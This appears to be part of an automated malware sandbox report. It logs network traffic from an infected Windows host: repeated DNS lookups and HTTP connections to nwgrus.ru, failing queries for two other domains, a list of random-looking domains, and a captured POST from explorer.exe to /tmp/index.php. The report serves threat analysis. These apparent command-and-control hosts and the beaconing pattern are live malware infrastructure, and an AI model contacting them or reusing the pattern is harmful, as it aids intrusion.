Oct 11, 2024 06:40:20.395510912 CEST	50856	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:20.400554895 CEST	80	50856	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:20.400655985 CEST	50856	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:20.400799036 CEST	50856	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:20.400823116 CEST	50856	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:20.405628920 CEST	80	50856	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:20.405764103 CEST	80	50856	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:21.583488941 CEST	80	50856	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:21.583538055 CEST	80	50856	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:21.583692074 CEST	50856	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:21.583805084 CEST	50856	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:21.588613033 CEST	80	50856	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:33.584899902 CEST	50857	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:33.589828014 CEST	80	50857	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:33.589977026 CEST	50857	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:33.590082884 CEST	50857	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:33.594906092 CEST	80	50857	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:33.594959021 CEST	50857	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:33.599773884 CEST	80	50857	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:34.773993969 CEST	80	50857	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:34.775688887 CEST	80	50857	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:34.775789976 CEST	50857	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:34.775902987 CEST	50857	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:34.780730963 CEST	80	50857	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:46.043612003 CEST	50858	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:46.048630953 CEST	80	50858	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:46.048737049 CEST	50858	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:46.048886061 CEST	50858	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:46.048918962 CEST	50858	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:46.053699970 CEST	80	50858	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:46.053898096 CEST	80	50858	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:47.321197987 CEST	80	50858	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:47.322803974 CEST	80	50858	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:47.322863102 CEST	50858	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:47.324803114 CEST	50858	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:47.329617977 CEST	80	50858	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:58.694946051 CEST	50859	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:58.699784994 CEST	80	50859	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:58.699861050 CEST	50859	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:58.699985027 CEST	50859	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:58.699999094 CEST	50859	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:40:58.704843998 CEST	80	50859	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:58.704989910 CEST	80	50859	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:59.976272106 CEST	80	50859	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:59.976911068 CEST	80	50859	186.233.231.45	192.168.2.4
Oct 11, 2024 06:40:59.977004051 CEST	50859	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:41:00.294946909 CEST	50859	80	192.168.2.4	186.233.231.45
Oct 11, 2024 06:41:00.299911976 CEST	80	50859	186.233.231.45	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 06:37:17.954185963 CEST	53	65121	1.1.1.1	192.168.2.4
Oct 11, 2024 06:37:23.740147114 CEST	51504	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:37:24.727827072 CEST	51504	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:37:25.732738972 CEST	51504	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:37:26.077781916 CEST	53	51504	1.1.1.1	192.168.2.4
Oct 11, 2024 06:37:26.077836037 CEST	53	51504	1.1.1.1	192.168.2.4
Oct 11, 2024 06:37:26.077867031 CEST	53	51504	1.1.1.1	192.168.2.4
Oct 11, 2024 06:38:25.757343054 CEST	51198	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:38:25.766674995 CEST	53	51198	1.1.1.1	192.168.2.4
Oct 11, 2024 06:38:25.769102097 CEST	63071	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:38:25.778225899 CEST	53	63071	1.1.1.1	192.168.2.4
Oct 11, 2024 06:39:35.412800074 CEST	51685	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:39:35.572805882 CEST	53	51685	1.1.1.1	192.168.2.4
Oct 11, 2024 06:39:35.588800907 CEST	61990	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:39:35.618767977 CEST	53	61990	1.1.1.1	192.168.2.4
Oct 11, 2024 06:39:42.691665888 CEST	55202	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:39:42.722254038 CEST	53	55202	1.1.1.1	192.168.2.4
Oct 11, 2024 06:39:42.743160963 CEST	50858	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:39:42.752224922 CEST	53	50858	1.1.1.1	192.168.2.4
Oct 11, 2024 06:39:51.860150099 CEST	49494	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:39:51.869596004 CEST	53	49494	1.1.1.1	192.168.2.4
Oct 11, 2024 06:39:51.891098976 CEST	60454	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:39:51.899645090 CEST	53	60454	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:00.900077105 CEST	57273	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:00.908900976 CEST	53	57273	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:00.911233902 CEST	61879	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:00.920773983 CEST	53	61879	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:05.143913031 CEST	58952	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:06.159843922 CEST	58952	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:07.173728943 CEST	58952	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:07.579562902 CEST	53	58952	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:07.579612970 CEST	53	58952	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:07.579642057 CEST	53	58952	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:11.929418087 CEST	51939	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:11.938009024 CEST	53	51939	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:11.940094948 CEST	53451	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:11.949914932 CEST	53	53451	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:23.756772041 CEST	54774	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:24.138183117 CEST	53	54774	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:24.165797949 CEST	59281	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:24.174705029 CEST	53	59281	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:35.699882984 CEST	60040	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:35.730027914 CEST	53	60040	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:35.756925106 CEST	53379	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:35.766896963 CEST	53	53379	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:46.941129923 CEST	62927	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:46.950917959 CEST	53	62927	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:46.991712093 CEST	60215	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:47.022749901 CEST	53	60215	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:58.694205999 CEST	55226	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:58.724173069 CEST	53	55226	1.1.1.1	192.168.2.4
Oct 11, 2024 06:40:58.757436037 CEST	63111	53	192.168.2.4	1.1.1.1
Oct 11, 2024 06:40:58.911050081 CEST	53	63111	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2024 06:37:23.740147114 CEST	192.168.2.4	1.1.1.1	0xa53e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:24.727827072 CEST	192.168.2.4	1.1.1.1	0xa53e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:25.732738972 CEST	192.168.2.4	1.1.1.1	0xa53e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:38:25.757343054 CEST	192.168.2.4	1.1.1.1	0x195d	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:38:25.769102097 CEST	192.168.2.4	1.1.1.1	0x782a	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:35.412800074 CEST	192.168.2.4	1.1.1.1	0xcaa7	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:35.588800907 CEST	192.168.2.4	1.1.1.1	0xe7aa	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:42.691665888 CEST	192.168.2.4	1.1.1.1	0xdee	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:42.743160963 CEST	192.168.2.4	1.1.1.1	0xccf5	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:51.860150099 CEST	192.168.2.4	1.1.1.1	0x2fd8	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:51.891098976 CEST	192.168.2.4	1.1.1.1	0x2db5	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:00.900077105 CEST	192.168.2.4	1.1.1.1	0xf918	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:00.911233902 CEST	192.168.2.4	1.1.1.1	0xd224	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:05.143913031 CEST	192.168.2.4	1.1.1.1	0xbb0d	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:06.159843922 CEST	192.168.2.4	1.1.1.1	0xbb0d	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.173728943 CEST	192.168.2.4	1.1.1.1	0xbb0d	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:11.929418087 CEST	192.168.2.4	1.1.1.1	0xf9c7	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:11.940094948 CEST	192.168.2.4	1.1.1.1	0x4b5d	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:23.756772041 CEST	192.168.2.4	1.1.1.1	0x4d22	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:24.165797949 CEST	192.168.2.4	1.1.1.1	0x8dba	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:35.699882984 CEST	192.168.2.4	1.1.1.1	0x54f0	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:35.756925106 CEST	192.168.2.4	1.1.1.1	0xc4a6	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:46.941129923 CEST	192.168.2.4	1.1.1.1	0xc059	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:46.991712093 CEST	192.168.2.4	1.1.1.1	0x7881	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:58.694205999 CEST	192.168.2.4	1.1.1.1	0x56ba	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:58.757436037 CEST	192.168.2.4	1.1.1.1	0x51a1	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077781916 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077836037 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:37:26.077867031 CEST	1.1.1.1	192.168.2.4	0xa53e	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:38:25.766674995 CEST	1.1.1.1	192.168.2.4	0x195d	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:38:25.778225899 CEST	1.1.1.1	192.168.2.4	0x782a	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:35.572805882 CEST	1.1.1.1	192.168.2.4	0xcaa7	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:35.618767977 CEST	1.1.1.1	192.168.2.4	0xe7aa	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:42.722254038 CEST	1.1.1.1	192.168.2.4	0xdee	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:42.752224922 CEST	1.1.1.1	192.168.2.4	0xccf5	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:51.869596004 CEST	1.1.1.1	192.168.2.4	0x2fd8	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:39:51.899645090 CEST	1.1.1.1	192.168.2.4	0x2db5	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:00.908900976 CEST	1.1.1.1	192.168.2.4	0xf918	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:00.920773983 CEST	1.1.1.1	192.168.2.4	0xd224	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579562902 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579612970 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:07.579642057 CEST	1.1.1.1	192.168.2.4	0xbb0d	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:11.938009024 CEST	1.1.1.1	192.168.2.4	0xf9c7	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:11.949914932 CEST	1.1.1.1	192.168.2.4	0x4b5d	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:24.138183117 CEST	1.1.1.1	192.168.2.4	0x4d22	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:24.174705029 CEST	1.1.1.1	192.168.2.4	0x8dba	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:35.730027914 CEST	1.1.1.1	192.168.2.4	0x54f0	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:35.766896963 CEST	1.1.1.1	192.168.2.4	0xc4a6	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:46.950917959 CEST	1.1.1.1	192.168.2.4	0xc059	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:47.022749901 CEST	1.1.1.1	192.168.2.4	0x7881	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:58.724173069 CEST	1.1.1.1	192.168.2.4	0x56ba	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 11, 2024 06:40:58.911050081 CEST	1.1.1.1	192.168.2.4	0x51a1	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

fxxmebwwqsmoglpj.com

nwgrus.ru

uwmajrkjinpjtb.com

vdgnwysksin.net

mnxigvfksbogudg.com

kixruudymeg.net

noqnaadfmcqiqh.net

xgcqobnogyn.org

tkdovmgcqkpkau.com

jdcljhdxiwgilrm.org

ktpfbekvdosn.net

egphyymsnbbon.net

aedejmbyprcj.org

hvawqwmqdyhhbuvh.net

pmvtliwpktklau.com

faxctnknnkusgdi.net

lsncadftghcgkll.org

lpydjvblecmmk.org

iepqpqyryvhgtcv.org

oenjfnfpfgckga.org

nufhygmjiointcnq.com

hsidmskxdmqv.org

tnccrjrkqwl.org

ttovpyftqljtjbyu.net

rajflukkjfv.net

toscrejivnmddao.net

xkeohrrlcufnjh.net

wmgqjswjxdwbrcxb.com

kfvlpgkryjcljktf.net

qcmpeqxglbq.net

xorfrgussemjiclx.org

bpaltdgxnlbrc.org

ourjknfcrerebmfy.net

wijyucejeixqcq.org

tvxqtlroqjamdu.net

qiqpuprruvmqycfg.com

ducngusiibkxomb.org

itbfgbtaejscu.org

fmklqfxisct.com

ukccamwydghjkfi.org

nkxctepgnvx.org

ijdjdfrkcsdu.com

virsnusoyawwgc.com

mtnalmdiriqcam.com

chjuadirxhpxkwiq.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50549	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:26.087119102 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fxxmebwwqsmoglpj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: nwgrus.ru
